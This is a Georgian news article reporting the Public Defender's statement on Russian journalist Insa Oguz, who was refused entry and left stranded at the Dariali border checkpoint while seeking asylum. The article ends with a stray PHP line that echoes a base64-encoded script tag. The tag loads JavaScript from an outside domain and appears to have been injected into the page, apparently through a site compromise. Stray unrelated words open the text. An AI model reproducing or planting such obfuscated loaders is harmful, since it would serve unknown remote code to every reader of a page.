celsiusi
ავერსი საქკაბელი
საქართველოს სახალხო დამცველი ნინო ლომჯარია განცხადებას ავრცელებს, რომელშიც აღნიშნავს, რომ რუსეთის ფედერაციის მოქალაქე, ჟურნალისტი და ბლოგერი ინსა ოგუზი მიმდინარე წლის 13 ივნისიდან არასათანადო პირობებში იმყოფება „დარიალის“ სასაზღვრო-სამიგრაციო კონტროლის განყოფილების სასაზღვრო გამშვებ პუნქტში.
 
საქართველოს სახალხო დამცველი საქართველოს შინაგან საქმეთა სამინისტროს მოუწოდებს, იმოქმედოს საერთაშორისო სტანდარტისა და საუკეთესო პრაქტიკის შესაბამისად, მისცეს ინსა ოგუზს უსაფრთხო ტერიტორიასა და თავშესაფრის პროცედურაზე წვდომის შესაძლებლობა, ასევე სასაზღვრო-გამშვებ პუნქტში უზრუნველყონ მისთვის ღირსეული საარსებო პირობები.
 
„საქართველოს სახალხო დამცველისთვის ცნობილი გახდა, რომ რუსეთის ფედერაციის მოქალაქე, ჟურნალისტი და ბლოგერი ინსა ოგუზი მიმდინარე წლის 13 ივნისიდან არასათანადო პირობებში იმყოფება „დარიალის“ სასაზღვრო-სამიგრაციო კონტროლის განყოფილების სასაზღვრო გამშვებ პუნქტში. მიუხედავად იმისა, რომ პირმა საზღვარზე მოითხოვა საერთაშორისო დაცვა, მას უარი ეთქვა საქართველოში შემოსვლაზე.
 
15 ივნისს საზღვართან მისულ საქართველოს სახალხო დამცველის რწმუნებულს საპატრულო პოლიციის წარმომადგენლებმა პირის მონახულების შესაძლებლობა არ მისცეს, რაც სახალხო დამცველის უფლებამოსილების განხორციელების ხელშეშლას წარმოადგენს. სახალხო დამცველის წარმომადგენელი ინსა ოგუზს ტელეფონით დაუკავშირდა და შეიტყო, რომ ამჟამად იგი თავისუფალი სავაჭრო პუნქტის (Duty Free) ტერიტორიაზეა, სადაც არ აქვს წვდომა ჰიგიენის საშუალებებზე. ამასთან, ინსას თქმით, მიუხედავად იმისა, რომ მან თავშესაფრის მოთხოვნასთან ერთად განაცხადა, რომ რუსეთის ფედერაციაში დაბრუნების შემთხვევაში მას დაპატიმრება და არასათანადო მოპყრობა ემუქრება, იგი არ გადაამისამართეს საქართველოს შინაგან საქმეთა სამინისტროს მიგრაციის დეპარტამენტში, კანონით გათვალისწინებული თავშესაფრის პროცედურის დასაწყებად.
 
რაც შეეხება საქართველოს შინაგან საქმეთა სამინისტროს ოფიციალურ განცხადებას, რომ სახელმწიფოს აქვს უფლება შეზღუდოს უცხოელის ქვეყანაში შემოსვლა, აქ ხაზგასასმელია ის გარემოება, რომ თითოეული საქმე საჭიროებს ინდივიდუალურ შესწავლასა და შესაბამის დასაბუთებას, რასაც ამ კონკრეტულ საქმეში ვერ ვხედავთ. სამინისტროს განცხადება, ინსა ოგუზის ბრალეულობაზე საუბრისას, თავად ოგუზის მიერ მიწოდებულ ინფორმაციას და მასობრივი საინფორმაციო საშუალებებით გავრცელებულ ცნობებს ეყრდნობა. მასში არაფერია ნათქვამი იმის შესახებ, რომ სავსებით შესაძლებელია ინსა ოგუზის წინააღმდეგ აღძრული სისხლის სამართლის საქმის უკან მისი ჟურნალისტური და მოქმედი ხელისუფლების წარმომადგენლების წინააღმდეგ მიმართული საქმიანობა იდგეს.
 
საქართველოს სახალხო დამცველი განმარტავს, რომ მოცემულ ვითარებაში განსაკუთრებით მნიშვნელოვანია აღინიშნოს მიმღები ქვეყნის ვალდებულება გაძევებისგან დაცვასთან დაკავშირებით. ადამიანის უფლებათა და ძირითად თავისუფლებათა დაცვისა და „წამებისა და სხვა სახის სასტიკი, არაადამიანური ან ღირსების შემლახველი მოპყრობის და დასჯის წინააღმდეგ“ კონვენციების თანახმად, არც ერთმა მხარე-სახელმწიფომ არ უნდა მოახდინოს პირის გაძევება, დაბრუნება, (refouler) ან ექსტრადიცია სხვა სახელმწიფოში, როდესაც არსებობს სერიოზული საფრთხე, რომ მის მიმართ შესაძლოა გამოყენებულ იქნეს წამება ან ადამიანის უფლებების სხვა სერიოზული დარღვევა. აღნიშნულ დებულებასთან სრულ თანხვედრაშია ეროვნული კანონმდებლობა, რომელიც დაუშვებლად აღიარებს უცხოელის იმ ქვეყანაში გაძევებას, სადაც მის სიცოცხლეს და ჯანმრთელობას საფრთხე ემუქრება. მოცემულ საქმეზე მხედველობაში უნდა იქნეს მიღებული რუსეთის ფედერაციაში არსებული ადამიანის უფლებების მდგომარეობა, პირის ინდივიდუალური მახასიათებლები და ა.შ.
 
აღსანიშნავია, რომ ინფორმაციის საჯაროდ გავრცელების შემდეგ, ევროკავშირის ერთ-ერთმა წევრმა სახელმწიფომ ინსა ოგუზისათვის საკუთარი ქვეყნის ტერიტორიაზე მიღების თანხმობა განაცხადა. აღნიშნული გარემოება საქართველოს შინაგან საქმეთა სამინისტროს ანიჭებს კანონმდებლობით განსაზღვრულ შესაძლებლობას, მოახდინოს ინსა ოგუზის გაძევება მესამე, უსაფრთხო ქვეყანაში. ასეთ შემთხვევაში შესაძლებელია თავიდან ავირიდოთ პირის მოქალაქეობის ქვეყანაში გაძევების შედეგად, მის მიმართ შესაძლო წამების ან არაადამიანური მოპყრობის საფრთხე.
 
დღეს, 18 ივნისის მდგომარეობით ინსა ოგუზი კვლავ „დარიალის“ სასაზღვრო გამშვებ პუნქტში იმყოფება მინიმალური კომფორტის გარეშე. ჩვენ ხელთ არსებული ინფორმაციით, აღენიშნება მაღალი ტემპერატურა.
 
ყოველივე აღნიშნულის გათვალისწინებით, საქართველოს სახალხო დამცველი საქართველოს შინაგან საქმეთა სამინისტროს მოუწოდებს – იმოქმედოს საერთაშორისო სტანდარტისა და საუკეთესო პრაქტიკის შესაბამისად, მისცეს ინსა ოგუზს უსაფრთხო ტერიტორიასა და თავშესაფრის პროცედურაზე წვდომის შესაძლებლობა, ასევე სასაზღვრო-გამშვებ პუნქტში უზრუნველყონ მისთვის ღირსეული საარსებო პირობები; მათ შორის, დაუყოვნებლივ გაეწიოს შესაბამისი სამედიცინო დახმარება“, – აღნიშნულია სახალხო დამცველის განცხადებაში.
619
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");